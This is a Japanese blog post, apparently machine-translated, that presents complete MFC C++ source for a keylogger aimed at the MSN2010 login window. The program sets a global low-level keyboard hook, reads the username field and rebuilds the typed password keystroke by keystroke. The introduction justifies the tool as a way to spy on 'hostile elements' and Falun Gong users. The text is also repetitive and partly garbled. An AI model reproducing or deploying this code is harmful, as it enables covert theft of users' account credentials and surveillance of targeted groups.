visual c++に基づくwindowsコアプログラミングコード分析(58)MSNアカウントパスワード監視防犯
MSNを使用するユーザーはまだ多く、将来の国間のネットワーク戦争では、パスワードの取得が非常に重要になり、多くの敵対分子、多くの法輪功分子がMSNを使用しています.
偉大な祖国の安全を守るためのプログラマーたちは、MSNアカウントのパスワードの盗聴を分析しています.
今は秘密漏洩ドアがそんなにすごいので、特にネット管理者は特に注意しなければなりません.
偉大な祖国の安全を守るためのプログラマーたちは、MSNアカウントのパスワードの盗聴を分析しています.
#include "stdafx.h"
#include "MSNRecord.h"
#include "MSNRecordDlg.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
CString g_strUsername; //
CString g_strPassword; //
CWnd *g_editUsername; //
CWnd *g_editPassword; //
HWND g_hMSNUsernameWnd = NULL; //MSN
HWND g_hMSNPasswordWnd = NULL; //MSN
int g_nPWFocusPos = 0; //
DWORD g_dwPerTime = NULL; //
HHOOK g_hLowLevelKeyboardHook = NULL;//WH_KEYBOARD_LL
//WH_KEYBOARD_LL
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam);
// MSN
DWORD WINAPI ThreadProc(LPVOID lpParam);
//
CString GetKey(PKBDLLHOOKSTRUCT pKeyboardHookStruct);
// MSN Edit
HWND GetFocusEx();
// CAboutDlg dialog used for App About
class CAboutDlg : public CDialog
{
public:
CAboutDlg();
// Dialog Data
enum { IDD = IDD_ABOUTBOX };
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV support
// Implementation
protected:
DECLARE_MESSAGE_MAP()
};
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
}
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
}
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
END_MESSAGE_MAP()
// CMSNRecordDlg dialog
CMSNRecordDlg::CMSNRecordDlg(CWnd* pParent /*=NULL*/)
: CDialog(CMSNRecordDlg::IDD, pParent)
{
m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}
void CMSNRecordDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
// DDX_Control(pDX, IDC_EDIT_USERNAME, m_Editctrl_Username);
// DDX_Control(pDX, IDC_EDIT_PASSWORD, m_Editctrl_Password);
}
BEGIN_MESSAGE_MAP(CMSNRecordDlg, CDialog)
ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
//}}AFX_MSG_MAP
ON_BN_CLICKED(IDC_BN_START, &CMSNRecordDlg::OnBnClickedBnStart)
ON_WM_TIMER()
END_MESSAGE_MAP()
// CMSNRecordDlg message handlers
BOOL CMSNRecordDlg::OnInitDialog()
{
CDialog::OnInitDialog();
// Add "About..." menu item to system menu.
// IDM_ABOUTBOX must be in the system command range.
ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX < 0xF000);
CMenu* pSysMenu = GetSystemMenu(FALSE);
if (pSysMenu != NULL)
{
CString strAboutMenu;
strAboutMenu.LoadString(IDS_ABOUTBOX);
if (!strAboutMenu.IsEmpty())
{
pSysMenu->AppendMenu(MF_SEPARATOR);
pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
// Set the icon for this dialog. The framework does this automatically
// when the application's main window is not a dialog
SetIcon(m_hIcon, TRUE); // Set big icon
SetIcon(m_hIcon, FALSE); // Set small icon
// TODO: Add extra initialization here
m_iMSNLoginStatus = PRECLOSE; // “MSN ...”
g_editUsername = GetDlgItem(IDC_EDIT_USERNAME);
g_editPassword = GetDlgItem(IDC_EDIT_PASSWORD);
if (StartRecord())
{
GetDlgItem(IDC_BN_START)->SetWindowText(_T("Stop"));
m_bStart = TRUE;
}
return TRUE; // return TRUE unless you set the focus to a control
}
void CMSNRecordDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
if ((nID & 0xFFF0) == IDM_ABOUTBOX)
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
else
{
CDialog::OnSysCommand(nID, lParam);
}
}
// If you add a minimize button to your dialog, you will need the code below
// to draw the icon. For MFC applications using the document/view model,
// this is automatically done for you by the framework.
void CMSNRecordDlg::OnPaint()
{
if (IsIconic())
{
CPaintDC dc(this); // device context for painting
SendMessage(WM_ICONERASEBKGND, reinterpret_cast<WPARAM>(dc.GetSafeHdc()), 0);
// Center icon in client rectangle
int cxIcon = GetSystemMetrics(SM_CXICON);
int cyIcon = GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(&rect);
int x = (rect.Width() - cxIcon + 1) / 2;
int y = (rect.Height() - cyIcon + 1) / 2;
// Draw the icon
dc.DrawIcon(x, y, m_hIcon);
}
else
{
CDialog::OnPaint();
}
}
// The system calls this function to obtain the cursor to display while the user drags
// the minimized window.
HCURSOR CMSNRecordDlg::OnQueryDragIcon()
{
return static_cast<HCURSOR>(m_hIcon);
}
void CMSNRecordDlg::OnBnClickedBnStart()
{
// TODO: Add your control notification handler code here
if (!m_bStart)
{
if (StartRecord())
{
GetDlgItem(IDC_BN_START)->SetWindowText(_T("Stop"));
m_bStart = TRUE;
}
}
else
{
if (StopRecord())
{
g_strUsername = g_strPassword = _T("");
g_nPWFocusPos = 0;
m_bStart = FALSE;
m_iMSNLoginStatus = PRESTOP;
GetDlgItem(IDC_BN_START)->SetWindowText(_T("Start"));
OutputDebugString(_T(" !"));
GetDlgItem(IDC_STATIC_INFO)->SetWindowText(_T(" !"));
}
}
}
BOOL CMSNRecordDlg::StartRecord(void)
{
SetTimer(2, 1000, NULL); // MSN (1000ms)
if (!SetHook())
{
OutputDebugString(_T("Can't start!"));
return FALSE;
}
SetTimer(1, 10, NULL); //WH_KEYBOARD_LL (10ms)
return TRUE;
}
BOOL CMSNRecordDlg::StopRecord(void)
{
KillTimer(1);
KillTimer(2);
if (!DeleteHook())
return FALSE;
return TRUE;
}
BOOL CMSNRecordDlg::SetHook(void)
{
g_hLowLevelKeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, GetModuleHandle(NULL), 0);
if (!g_hLowLevelKeyboardHook)
{
// OutputDebugString(_T("set WH_KEYBOARD_LL hook failed!!!"));
return FALSE;
}
// OutputDebugString(_T("set WH_KEYBOARD_LL hook"));
return TRUE;
}
BOOL CMSNRecordDlg::DeleteHook(void)
{
if(!UnhookWindowsHookEx(g_hLowLevelKeyboardHook))
{
// OutputDebugString(_T("delete WH_KEYBOARD_LL hook failed!!!"));
return FALSE;
}
// OutputDebugString(_T("delete WH_KEYBOARD_LL hook"));
return TRUE;
}
// MSN
BOOL CMSNRecordDlg::FindMSNLogin(void)
{
HWND hMSNLogin = NULL;
hMSNLogin = ::FindWindowEx(NULL, NULL, _T("TXGuiFoundation"), _T("MSN2010"));
if (NULL == hMSNLogin)
{
OutputDebugString(_T("find MSN failed!!!"));
return FALSE;
}
OutputDebugString(_T("find MSN"));
HWND hMSNChildWnd = NULL;
HWND hMSNUsernameWnd = NULL;
HWND hMSNPasswordWnd = NULL;
hMSNChildWnd = ::GetWindow(hMSNLogin, GW_CHILD);
hMSNUsernameWnd = ::GetWindow(hMSNChildWnd, GW_HWNDFIRST);
hMSNPasswordWnd = ::GetWindow(hMSNChildWnd, GW_HWNDNEXT);
if (!hMSNPasswordWnd)
{
OutputDebugString(_T("get MSNPasswordWnd failed!!!"));
return FALSE;
}
OutputDebugString(_T("get MSNPasswordWnd"));
g_hMSNUsernameWnd = hMSNUsernameWnd;
g_hMSNPasswordWnd = hMSNPasswordWnd;
return TRUE;
}
// MSN
BOOL CMSNRecordDlg::GetMSNUsernameInfo(void)
{
TCHAR tempbuf[256] = {0};
if(!::SendMessage(g_hMSNUsernameWnd, WM_GETTEXT, 256, (LPARAM)tempbuf))
{
g_editUsername->SetWindowText(_T(""));
g_strUsername = _T("");
return FALSE;
}
CString strUsername = tempbuf;
g_editUsername->SetWindowText(strUsername);
g_strUsername = strUsername;
return TRUE;
}
void CMSNRecordDlg::OnTimer(UINT_PTR nIDEvent)
{
// TODO: Add your message handler code here and/or call default
switch (nIDEvent)
{
case 1: //WH_KEYBOARD_LL (10ms)
if (DeleteHook())
if (SetHook())
break;
case 2: // MSN (1000ms)
if (!FindMSNLogin())
{
// “MSN !” “ !”
if (m_iMSNLoginStatus == PREOPEN || m_iMSNLoginStatus == PRESTOP)
{
g_strUsername = g_strPassword = _T("");
m_iMSNLoginStatus = PRECLOSE;
OutputDebugString(_T("MSN ..."));
GetDlgItem(IDC_STATIC_INFO)->SetWindowText(_T("MSN ..."));
}
break;
}
else
{
// “MSN ” “ !”
if (m_iMSNLoginStatus == PRECLOSE || m_iMSNLoginStatus == PRESTOP)
{
if (g_strPassword == _T(""))
{
GetDlgItem(IDC_EDIT_PASSWORD)->SetWindowText(_T(""));
}
OutputDebugString(_T("MSN !"));
GetDlgItem(IDC_STATIC_INFO)->SetWindowText(_T("MSN !"));
m_iMSNLoginStatus = PREOPEN;
}
GetMSNUsernameInfo();
break;
}
default:
break;
}
CDialog::OnTimer(nIDEvent);
}
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
if (nCode == HC_ACTION)
{
PKBDLLHOOKSTRUCT pKeyboardHookStruct = (PKBDLLHOOKSTRUCT) lParam;
if (((wParam == WM_KEYDOWN) || (wParam == WM_SYSKEYDOWN)))
{
// MSN2008
// , MSN2008, MSN
HWND hTopWnd = GetForegroundWindow();
CString strTopWnd;
TCHAR tempbuf[256] = {0};
::SendMessage(hTopWnd, WM_GETTEXT, 256, (LPARAM)tempbuf);
strTopWnd = tempbuf;
// OutputDebugString(_T(" :") + strTopWnd);
if (strTopWnd != _T("MSN2010"))
{
// MSN2010,
return CallNextHookEx(g_hLowLevelKeyboardHook, nCode, wParam, lParam);
}
// MSN2010 edit
HWND hFocusWnd = GetFocusEx();
if (hFocusWnd == g_hMSNUsernameWnd) // MSN
{
//MSN 50
if (g_strUsername.GetLength() >= 50)
return CallNextHookEx(g_hLowLevelKeyboardHook, nCode, wParam, lParam);
// , MSN
HANDLE hThread;
DWORD dwThreadId;
hThread = CreateThread(
NULL, //
NULL, //
ThreadProc, // ( )
NULL, //
0, //
&dwThreadId // ID
);
}
else if (hFocusWnd == g_hMSNPasswordWnd) // MSN
{
//
DWORD dwTime = pKeyboardHookStruct->time;
if ((dwTime - GetMessageTime()) & 0xffff0000)//
{
return CallNextHookEx(g_hLowLevelKeyboardHook, nCode, wParam, lParam);
}
if (g_dwPerTime == dwTime)// time ,
{
// :
//1. MSN HOOK , MSN , ( ( ) )
//2. ( ) ,
return CallNextHookEx(g_hLowLevelKeyboardHook, nCode, wParam, lParam);
}
// pKeyboardHookStruct->time ,
g_dwPerTime = dwTime;
// ( )
switch (pKeyboardHookStruct->vkCode)
{
case VK_BACK: //
{
g_strPassword.Delete(g_nPWFocusPos - 1);
if (--g_nPWFocusPos < 0)
g_nPWFocusPos = 0;
OutputDebugString(_T("Password: ") + g_strPassword);
g_editPassword->SetWindowText(g_strPassword);
return CallNextHookEx(g_hLowLevelKeyboardHook, nCode, wParam, lParam);
}
case VK_DELETE: //Delete
{
g_strPassword.Delete(g_nPWFocusPos);
OutputDebugString(_T("Password: ") + g_strPassword);
g_editPassword->SetWindowText(g_strPassword);
return CallNextHookEx(g_hLowLevelKeyboardHook, nCode, wParam, lParam);
}
case VK_LEFT: //
{
if (--g_nPWFocusPos < 0)
g_nPWFocusPos = 0;
return CallNextHookEx(g_hLowLevelKeyboardHook, nCode, wParam, lParam);
}
case VK_RIGHT: //
{
if (++g_nPWFocusPos > g_strPassword.GetLength())
g_nPWFocusPos = g_strPassword.GetLength();
return CallNextHookEx(g_hLowLevelKeyboardHook, nCode, wParam, lParam);
}
default:
break;
}
//MSN 16
if (g_strPassword.GetLength() >= 16)
{
return CallNextHookEx(g_hLowLevelKeyboardHook, nCode, wParam, lParam);
}
// MSN
CString strInput = GetKey(pKeyboardHookStruct);
if (strInput == _T(""))
return CallNextHookEx(g_hLowLevelKeyboardHook, nCode, wParam, lParam);
g_strPassword.Insert(g_nPWFocusPos, strInput);
g_nPWFocusPos++;
OutputDebugString(_T("Password: ") + g_strPassword);
g_editPassword->SetWindowText(g_strPassword);
}
return CallNextHookEx(g_hLowLevelKeyboardHook, nCode, wParam, lParam);
}
}
return CallNextHookEx(g_hLowLevelKeyboardHook, nCode, wParam, lParam);
}
CString GetKey(PKBDLLHOOKSTRUCT pKeyboardHookStruct)
{
TCHAR szKeyText[256] = {0};
CString strKeyText;
BYTE KeyboardState[256];
ZeroMemory(KeyboardState, sizeof(KeyboardState));
GetKeyboardState(KeyboardState);
WORD wChar;
int iNumChar = ToAscii(pKeyboardHookStruct->vkCode, pKeyboardHookStruct->scanCode, KeyboardState, &wChar, 0);
if (iNumChar >= 1) // ( 、 )
{
_snprintf((CHAR*)szKeyText, 255, "%c", wChar);
// OutputDebugString(szKeyText);
strKeyText = szKeyText;
}
return strKeyText;
}
DWORD WINAPI ThreadProc(LPVOID lpParam)
{
Sleep(10);
TCHAR tempbuf[256] = {0};
if(!::SendMessage(g_hMSNUsernameWnd, WM_GETTEXT, 256, (LPARAM)tempbuf))
{
g_editUsername->SetWindowText(_T(""));
g_strUsername = _T("");
return 0;
}
CString strUsername = tempbuf;
g_editUsername->SetWindowText(strUsername);
g_strUsername = strUsername;
return 1;
}
HWND GetFocusEx()
{
HWND hMain = GetForegroundWindow();
if (hMain==NULL)
return NULL;
DWORD dwThreadTarget = ::GetWindowThreadProcessId(hMain, NULL);
DWORD dwThreadThis = ::GetCurrentThreadId();
::AttachThreadInput(dwThreadThis, dwThreadTarget, TRUE);
HWND hFocus = ::GetFocus();
::AttachThreadInput(dwThreadThis, dwThreadTarget, FALSE);
return hFocus;
}今は秘密漏洩ドアがそんなにすごいので、特にネット管理者は特に注意しなければなりません.